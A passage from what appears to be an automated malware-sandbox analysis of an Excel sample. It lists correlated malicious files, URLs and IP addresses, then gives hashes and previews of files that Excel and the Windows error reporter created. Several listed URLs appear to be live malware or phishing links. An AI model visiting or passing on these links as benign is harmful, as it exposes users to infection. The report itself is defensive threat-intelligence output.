                      • ebookcenter.vvs.ir/dlversion.php?id=Herb%20Blackburn
                      19List.exeGet hashmaliciousBrowse
                      • www.pfwbn.com/dm/?id=XISGJT3EqbPKoaX7rl8KuN74u7B41XTmCz7eDwqqLFsPGp7qlDpp0+n9XSmpMmt+WE59iXFYb8Eb/apyiXADlg==&sql=1
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      FACT-90D93210.docGet hashmaliciousBrowse
                      • caspianlab.com/XRKJO8m
                      36history.550.js.js.jsGet hashmaliciousBrowse
                      • dragqueenwig.com/itukabk

                      Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                      cdn.digicertcdn.comINV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                      • 104.18.11.39
                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                      • 104.18.10.39
                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                      • 104.18.10.39
                      SurfsharkSetup.exeGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                      • 104.18.10.39
                      ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                      • 104.18.10.39
                      RFQ.docGet hashmaliciousBrowse
                      • 104.18.10.39
                      SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                      • 104.18.11.39
                      http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                      • 104.18.11.39
                      https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                      • 104.18.10.39
                      Vessel details.docGet hashmaliciousBrowse
                      • 104.18.11.39
                      excel.xlsGet hashmaliciousBrowse
                      • 104.18.11.39

                      ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                      BODIS-NJUSIRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      mQFXD5FxGT.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      099898892.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                      • 199.59.242.153
                      990109.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      SAWR000148651.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                      • 199.59.242.153
                      IRS Notice Letter.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      IRS Notice Letter.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      Payment Order Inv.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      h3dFAROdF3.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      kqwqyoFz1C.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      file.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      PByYRsoSNX.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      3Y690n1UsS.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                      • 199.59.242.153
                      SOA121520.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      googlechrome_3843.exeGet hashmaliciousBrowse
                      • 199.59.242.153
                      cap.exeGet hashmaliciousBrowse
                      • 199.59.242.153

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):914
                      Entropy (8bit):7.367371959019618
                      Encrypted:false
                      SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                      MD5:E4A68AC854AC5242460AFD72481B2A44
                      SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                      SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                      SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                      Malicious:false
                      Reputation:moderate, very likely benign file
Preview: DER-encoded X.509 certificate; issuer and subject C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Global Root G2; validity 130801120000Z to 380115120000Z (remaining binary omitted)
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                      Category:dropped
                      Size (bytes):58936
                      Entropy (8bit):7.994797855729196
                      Encrypted:true
                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                      MD5:E4F1E21910443409E81E5B55DC8DE774
                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                      Malicious:false
                      Reputation:high, very likely benign file
Preview: MSCF (Microsoft Cabinet) header; the archive contains authroot.stl (compressed binary omitted)
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):252
                      Entropy (8bit):3.0862995200743666
                      Encrypted:false
                      SSDEEP:6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/
                      MD5:0FCAC07AEFF591E1FF36221FC15993B5
                      SHA1:6AF4105DB3149F0580D3E8347CE34161EB9D1263
                      SHA-256:866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A
                      SHA-512:A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970
                      Malicious:false
                      Reputation:low
Preview: CryptnetUrlCache metadata record (UTF-16) for the cached URL http://cacerts.digicert.com/DigiCertGlobalRootG2.crt, followed by the quoted tag "5a286417-392"
                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):326
                      Entropy (8bit):3.117051994467751
                      Encrypted:false
                      SSDEEP:6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2
                      MD5:4FA401A194E5284B0318ED59396335C5
                      SHA1:82F0AEA431C0AC660303423D44DEC0F299C8D1E4
                      SHA-256:6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8
                      SHA-512:D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F
                      Malicious:false
                      Reputation:low
Preview: CryptnetUrlCache metadata record (UTF-16) for the cached URL http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab, followed by the quoted tag "069559e2a0d61:0"
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B9858B0.emf
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):1408
                      Entropy (8bit):2.270567557934206
                      Encrypted:false
                      SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                      MD5:40550DC2F9D56285FA529159B8F2C6A5
                      SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                      SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                      SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                      Malicious:false
                      Reputation:moderate, very likely benign file
Preview: EMF header (EMF signature, GDIC record) followed by binary drawing records (omitted)
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A342A0F1.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):2653
                      Entropy (8bit):7.818766151665501
                      Encrypted:false
                      SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                      MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                      SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                      SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                      SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                      Malicious:false
                      Reputation:low
Preview: PNG header with IHDR, a tEXt chunk (Software=Adobe ImageReady), PLTE and IDAT chunks; compressed image data omitted
                      C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_09e1e9e2\Report.wer
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:modified
                      Size (bytes):16312
                      Entropy (8bit):3.7163402135276207
                      Encrypted:false
                      SSDEEP:96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG
                      MD5:0FDF227B92A2ECDFE906E27D6C032F8A
                      SHA1:0EB3004A2A4905A6DEAB1996B86B4328860EE777
                      SHA-256:11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093
                      SHA-512:B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061
                      Malicious:false
                      Reputation:low
Preview (UTF-16 text, decoded):
Version=1
EventType=APPCRASH
EventTime=132548920870820837
ReportType=2
Consent=1
UploadTime=132548921039925134
ReportIdentifier=cd7037a3-547d-11eb-adcf-ecf4bbb5915b
IntegratorReportIdentifier=cd7037a2-547d-11eb-adcf-ecf4bbb5915b
Response.BucketId=3701159261
Response.BucketTable=380707525
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=EXCEL.EXE
Sig[1].Name=Application Version
Sig[1].Value=14.0.7015.1000
Sig[2].Name=Application Timestamp
Sig[2].Value=51cca7cd
Sig[3].Nam
                      C:\Users\user\AppData\Local\Temp\67FE0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):56572
                      Entropy (8bit):7.850619347326348
                      Encrypted:false
                      SSDEEP:768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z
                      MD5:DEC0E4FC83D4C848B110DB20629C98DC
                      SHA1:9A7EC2860D75C9984F6713A08DA3085EF6BC91AE
                      SHA-256:FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812
                      SHA-512:1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9
                      Malicious:false
                      Reputation:low
                      C:\Users\user\AppData\Local\Temp\998453.cvr
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1392
                      Entropy (8bit):3.142934598289609
                      Encrypted:false
                      SSDEEP:24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY
                      MD5:91CFCC4A1A09DB77E653BB2E13F9B179
                      SHA1:165023666DAE5D631E04A9220442E401075DB3D1
                      SHA-256:BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422
                      SHA-512:2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\Cab955E.tmp
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                      Category:dropped
                      Size (bytes):58936
                      Entropy (8bit):7.994797855729196
                      Encrypted:true
                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                      MD5:E4F1E21910443409E81E5B55DC8DE774
                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):241332
                      Entropy (8bit):4.206769656577553
                      Encrypted:false
                      SSDEEP:1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq
                      MD5:C5E9F5703FA359DD72FBB85355945491
                      SHA1:21549B782C4424D9100D4477D34847842528426E
                      SHA-256:98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95
                      SHA-512:0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\Tar955F.tmp
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):152533
                      Entropy (8bit):6.31602258454967
                      Encrypted:false
                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\WER8CF4.tmp.WERInternalMetadata.xml
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3110
                      Entropy (8bit):3.6796097788243274
                      Encrypted:false
                      SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI
                      MD5:9951D43E6E3E0625775F9777E865C7B5
                      SHA1:6D551E14B691ED0A9383729CDD21BE086CD055AA
                      SHA-256:2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D
                      SHA-512:8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D
                      Malicious:false
                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                      C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar67E4.xar
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:modified
                      Size (bytes):51613
                      Entropy (8bit):7.823714360059984
                      Encrypted:false
